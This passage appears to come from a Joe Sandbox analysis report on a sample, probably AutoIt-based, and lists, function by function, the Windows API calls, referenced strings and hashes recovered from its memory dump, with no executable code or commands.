                              • Instruction Fuzzy Hash: F2114AB2504209EFDB118FA4DD49FDA7BA9FF08714F044166FA04E2160C6719E60AB61
                              APIs
                                • Part of subcall function 008812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0088134D
                                • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088135C
                                • Part of subcall function 008812F3: BeginPath.GDI32(?), ref: 00881373
                                • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088139C
                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0090C1C4
                              • LineTo.GDI32(00000000,00000003,?), ref: 0090C1D8
                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0090C1E6
                              • LineTo.GDI32(00000000,00000000,?), ref: 0090C1F6
                              • EndPath.GDI32(00000000), ref: 0090C206
                              • StrokePath.GDI32(00000000), ref: 0090C216
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                              • String ID:
                              • API String ID: 43455801-0
                              • Opcode ID: ce98479c4fab7837663ca0d2d22fd6c3feebe60417b4c29952133d6eda68470b
                              • Instruction ID: 850b8316c13ba154ec8f1deac25e582e43b9bd2ee6d3512912b57753274d102e
                              • Opcode Fuzzy Hash: ce98479c4fab7837663ca0d2d22fd6c3feebe60417b4c29952133d6eda68470b
                              • Instruction Fuzzy Hash: 09111BB640810CBFDF119F94DC88FAA7FADEF09354F048021BA188A5A1C7719E55EBA0
                              APIs
                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A03D3
                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 008A03DB
                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A03E6
                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A03F1
                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 008A03F9
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008A0401
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Virtual
                              • String ID:
                              • API String ID: 4278518827-0
                              • Opcode ID: c069bdf56114c9912dedbcc37c4a7db2837ae170db7ce178728141ec7771ee23
                              • Instruction ID: f28b384e10350ffd9a44f37633fc6fa819085a694c9beae79b76f30df141b19a
                              • Opcode Fuzzy Hash: c069bdf56114c9912dedbcc37c4a7db2837ae170db7ce178728141ec7771ee23
                              • Instruction Fuzzy Hash: 35016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E569B
                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008E56B1
                              • GetWindowThreadProcessId.USER32(?,?), ref: 008E56C0
                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E56CF
                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E56D9
                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E56E0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                              • String ID:
                              • API String ID: 839392675-0
                              • Opcode ID: 3a2e6ce6df0b9d2f1ab10d25040f45f4c379fdaa2d47b99f6854cc81d8a9779f
                              • Instruction ID: d8d3bb6daed54b92c467a2159ad401ede001c690ed63d35edf500b53831c2a6b
                              • Opcode Fuzzy Hash: 3a2e6ce6df0b9d2f1ab10d25040f45f4c379fdaa2d47b99f6854cc81d8a9779f
                              • Instruction Fuzzy Hash: BAF01D32259558BFE7315BA29C1DEAB7B7CEBC6B11F000169FA04D14609AA11B0196B5
                              APIs
                              • InterlockedExchange.KERNEL32(?,?), ref: 008E74E5
                              • EnterCriticalSection.KERNEL32(?,?,00891044,?,?), ref: 008E74F6
                              • TerminateThread.KERNEL32(00000000,000001F6,?,00891044,?,?), ref: 008E7503
                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00891044,?,?), ref: 008E7510
                                • Part of subcall function 008E6ED7: CloseHandle.KERNEL32(00000000,?,008E751D,?,00891044,?,?), ref: 008E6EE1
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E7523
                              • LeaveCriticalSection.KERNEL32(?,?,00891044,?,?), ref: 008E752A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                              • String ID:
                              • API String ID: 3495660284-0
                              • Opcode ID: 606fdc38c681bc19b398265b412fe13b7e3fa5d527d2ff9cff47067c528416d5
                              • Instruction ID: 07032e2d4dd716a57adb5ebb557492a498593b0f6cb98fb0340c7f0d150ff85d
                              • Opcode Fuzzy Hash: 606fdc38c681bc19b398265b412fe13b7e3fa5d527d2ff9cff47067c528416d5
                              • Instruction Fuzzy Hash: 44F05E3A158B12EFDB212B68FC9C9EB7B2AFF45702B100531F202918B4DB755A51DB90
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008D8E7F
                              • UnloadUserProfile.USERENV(?,?), ref: 008D8E8B
                              • CloseHandle.KERNEL32(?), ref: 008D8E94
                              • CloseHandle.KERNEL32(?), ref: 008D8E9C
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008D8EA5
                              • HeapFree.KERNEL32(00000000), ref: 008D8EAC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                              • String ID:
                              • API String ID: 146765662-0
                              • Opcode ID: 5fd11a196b21a6896ba2a884260528a47f40ee199e95884236d9d0c8ddf35f8d
                              • Instruction ID: 8f9bbf84d9c719a86ad8372bf59e268435a320e341ca4ea3f4a1b51728f88cc4
                              • Opcode Fuzzy Hash: 5fd11a196b21a6896ba2a884260528a47f40ee199e95884236d9d0c8ddf35f8d
                              • Instruction Fuzzy Hash: 3AE0C236018601FFDA115FE1EC1C90ABB79FB89B62B108230F219C1870CB329560EB90
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 008F8928
                              • CharUpperBuffW.USER32(?,?), ref: 008F8A37
                              • VariantClear.OLEAUT32(?), ref: 008F8BAF
                                • Part of subcall function 008E7804: VariantInit.OLEAUT32(00000000), ref: 008E7844
                                • Part of subcall function 008E7804: VariantCopy.OLEAUT32(00000000,?), ref: 008E784D
                                • Part of subcall function 008E7804: VariantClear.OLEAUT32(00000000), ref: 008E7859
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                              • API String ID: 4237274167-1221869570
                              • Opcode ID: 7c7e0942392d40a932cb4432a9d6b86288a1bb1be7b223200617263e9b173bc3
                              • Instruction ID: dd277188b70625708b1628fcbf87b11b31500a3048ae9b3794a2c6699be8c30f
                              • Opcode Fuzzy Hash: 7c7e0942392d40a932cb4432a9d6b86288a1bb1be7b223200617263e9b173bc3
                              • Instruction Fuzzy Hash: 62915771608305DFC714EF28C48596ABBE4FF89714F04496EF99ACB262DB30E906CB52
                              APIs
                                • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                              • _memset.LIBCMT ref: 008E3077
                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E30A6
                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E3159
                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008E3187
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                              • String ID: 0
                              • API String ID: 4152858687-4108050209
                              • Opcode ID: de514655849193cb98a51628ae507afa10d472d3631ce88a2f39e34667357398
                              • Instruction ID: e7e971594ecd8c0b2f87eb54015f05ebc092ecfee90973de7545b8ad91a5eaaf
                              • Opcode Fuzzy Hash: de514655849193cb98a51628ae507afa10d472d3631ce88a2f39e34667357398
                              • Instruction Fuzzy Hash: 1851B071618380AED7259F29C849A6BB7E8FF97364F040A2DF895D3291DB70CE448753
                              APIs
                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008DDAC5
                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008DDAFB
                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 008DDB0C
                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008DDB8E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorMode$AddressCreateInstanceProc
                              • String ID: DllGetClassObject
                              • API String ID: 753597075-1075368562
                              • Opcode ID: fbf4231685f8d37c04ecf4cd80eeb0a33981f31216d9bdf21a37fc6f35a526f0
                              • Instruction ID: de9e762a70995c1ee1f30afc382ae26b390cf162c0dc517ed6ad7b0900a7ab1a
                              • Opcode Fuzzy Hash: fbf4231685f8d37c04ecf4cd80eeb0a33981f31216d9bdf21a37fc6f35a526f0
                              • Instruction Fuzzy Hash: B5414CB1600309EFDB15CF54C884A9A7BA9FF48364F1582ABAD05DF305D7B1DA44DBA0
                              APIs
                              • _memset.LIBCMT ref: 008E2CAF
                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008E2CCB
                              • DeleteMenu.USER32(?,00000007,00000000), ref: 008E2D11
                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00946890,00000000), ref: 008E2D5A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Menu$Delete$InfoItem_memset
                              • String ID: 0
                              • API String ID: 1173514356-4108050209
                              • Opcode ID: e1f279325e3fab6c0e99ab04e54c6167e2e927b1aca332a313f4a9d717eba635
                              • Instruction ID: 2ac68c5aef11cf3814ac4e4f3ee0b7d94c8ea95fd0e23b4cdd03a56b8697b4c0
                              • Opcode Fuzzy Hash: e1f279325e3fab6c0e99ab04e54c6167e2e927b1aca332a313f4a9d717eba635
                              • Instruction Fuzzy Hash: 24418D702093859FD724DF29DC44B1ABBA8FF86320F14466DFA65D7291D770E904CB92
                              APIs
                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008FDAD9
                                • Part of subcall function 008879AB: _memmove.LIBCMT ref: 008879F9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharLower_memmove
                              • String ID: cdecl$none$stdcall$winapi
                              • API String ID: 3425801089-567219261
                              • Opcode ID: 4959330e20f503de0f715752494be7b8a7a512be3748ee21c51d550d4e452e45
                              • Instruction ID: eb16e577993ae86790cda170bb0273fafe040fd8b63bd95524dc82ff83c75186
                              • Opcode Fuzzy Hash: 4959330e20f503de0f715752494be7b8a7a512be3748ee21c51d550d4e452e45
                              • Instruction Fuzzy Hash: 7531A17150421DAFCF14EF68CC819BEB7B5FF05320B108A29EA65D7691CB71E906CB81
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008D93F6
                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008D9409
                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 008D9439
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$_memmove$ClassName
                              • String ID: ComboBox$ListBox
                              • API String ID: 365058703-1403004172
                              • Opcode ID: 5ba7926609221bdf0d35ab9847b29ca234136a1d49c66e0b77e449620a13ccd0
                              • Instruction ID: a6adef4e44686b21fe98962b67870ecbaaeb5a71a8f6e80852ecb3ef42ae75d4
                              • Opcode Fuzzy Hash: 5ba7926609221bdf0d35ab9847b29ca234136a1d49c66e0b77e449620a13ccd0
                              • Instruction Fuzzy Hash: B1210471900108AEDB18AB78CC858FFB779FF45364F10421AF961E72E1DB355E0A9610
                              APIs
                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008BD5EC
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              • _memset.LIBCMT ref: 0088418D
                              • _wcscpy.LIBCMT ref: 008841E1
                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008841F1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                              • String ID: Line:
                              • API String ID: 3942752672-1585850449
                              • Opcode ID: 4356f77344820153b87935655d39a65bf43e30d27cb96400eeb2afa83b558562
                              • Instruction ID: ce68af2b9850af9c8c7c309ca72507e7d7d487adfc08885a0bb8ad44da7e3601
                              • Opcode Fuzzy Hash: 4356f77344820153b87935655d39a65bf43e30d27cb96400eeb2afa83b558562
                              • Instruction Fuzzy Hash: 9B3190B200C315AAE731FB68DC45FDB77E8FB56314F20461AB195D20A1EBB4A648C793
                              APIs
                                • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009066D0
                              • LoadLibraryW.KERNEL32(?), ref: 009066D7
                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009066EC
                              • DestroyWindow.USER32(?), ref: 009066F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                              • String ID: SysAnimate32
                              • API String ID: 4146253029-1011021900
                              • Opcode ID: 33d93bf9a4ee45eea18c8cab8ab6de587f299811c8b605efa7b7d8722cf3e660
                              • Instruction ID: 1d43bff58b5fc22a1444e75788d0def404a43abdce5221c0bf1c0663cd66c059
                              • Opcode Fuzzy Hash: 33d93bf9a4ee45eea18c8cab8ab6de587f299811c8b605efa7b7d8722cf3e660
                              • Instruction Fuzzy Hash: 29219D7120020AAFEF104F68EC80EBB37ADEB59768F104629F911921E0D772CC61A760
                              APIs
                              • GetStdHandle.KERNEL32(0000000C), ref: 008E705E
                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E7091
                              • GetStdHandle.KERNEL32(0000000C), ref: 008E70A3
                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008E70DD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateHandle$FilePipe
                              • String ID: nul
                              • API String ID: 4209266947-2873401336
                              • Opcode ID: d9793d66499278c4125904bacfb6d351568e419b3b2d74a120efae6f13b2a0d4
                              • Instruction ID: 0a19a64de08e5152bbc74bf931c841a5201c594ae6c2b8d807aa07d9e84374fb
                              • Opcode Fuzzy Hash: d9793d66499278c4125904bacfb6d351568e419b3b2d74a120efae6f13b2a0d4
                              • Instruction Fuzzy Hash: 31218E7450864AABDB209F3ADC05A9A77A8FF56724F204A19FCA0D72D0E7B099509B50
                              APIs
                              • GetStdHandle.KERNEL32(000000F6), ref: 008E712B
                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E715D
                              • GetStdHandle.KERNEL32(000000F6), ref: 008E716E
                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008E71A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateHandle$FilePipe
                              • String ID: nul
                              • API String ID: 4209266947-2873401336
                              • Opcode ID: 9acc3c5f8c49e5f56fb63e811cfc64c597277fd1261acd863eab31b6d066db27
                              • Instruction ID: f591bdc3a56c1a99c8e1629faff4f4280848885110e2b28158b2e0719292eca7
                              • Opcode Fuzzy Hash: 9acc3c5f8c49e5f56fb63e811cfc64c597277fd1261acd863eab31b6d066db27
                              • Instruction Fuzzy Hash: CF21B375508389ABDB209F6A9C04A9AB7E8FF56734F200619FDB0D32D0E770D951CB51
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 008EAEBF
                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008EAF13
                              • __swprintf.LIBCMT ref: 008EAF2C
                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0090F910), ref: 008EAF6A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume__swprintf
                              • String ID: %lu
                              • API String ID: 3164766367-685833217
                              • Opcode ID: 8ec9aee043d650bd2c21ec5dcbe8bcaf84b1126739dac50a52ce28f4c5b941e5
                              • Instruction ID: 796973e84abdc56c1af81819ab9705292bb51b3a92d7a68b86ca67bc7b5bfe1f
                              • Opcode Fuzzy Hash: 8ec9aee043d650bd2c21ec5dcbe8bcaf84b1126739dac50a52ce28f4c5b941e5
                              • Instruction Fuzzy Hash: EF218330A00109AFCB10EF69CC85DAE7BB8FF89714B004069F949EB251DB71EE41DB62
                              APIs
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                • Part of subcall function 008DA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008DA399
                                • Part of subcall function 008DA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 008DA3AC
                                • Part of subcall function 008DA37C: GetCurrentThreadId.KERNEL32 ref: 008DA3B3
                                • Part of subcall function 008DA37C: AttachThreadInput.USER32(00000000), ref: 008DA3BA
                              • GetFocus.USER32 ref: 008DA554
                                • Part of subcall function 008DA3C5: GetParent.USER32(?), ref: 008DA3D3
                              • GetClassNameW.USER32(?,?,00000100), ref: 008DA59D
                              • EnumChildWindows.USER32(?,008DA615), ref: 008DA5C5
                              • __swprintf.LIBCMT ref: 008DA5DF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
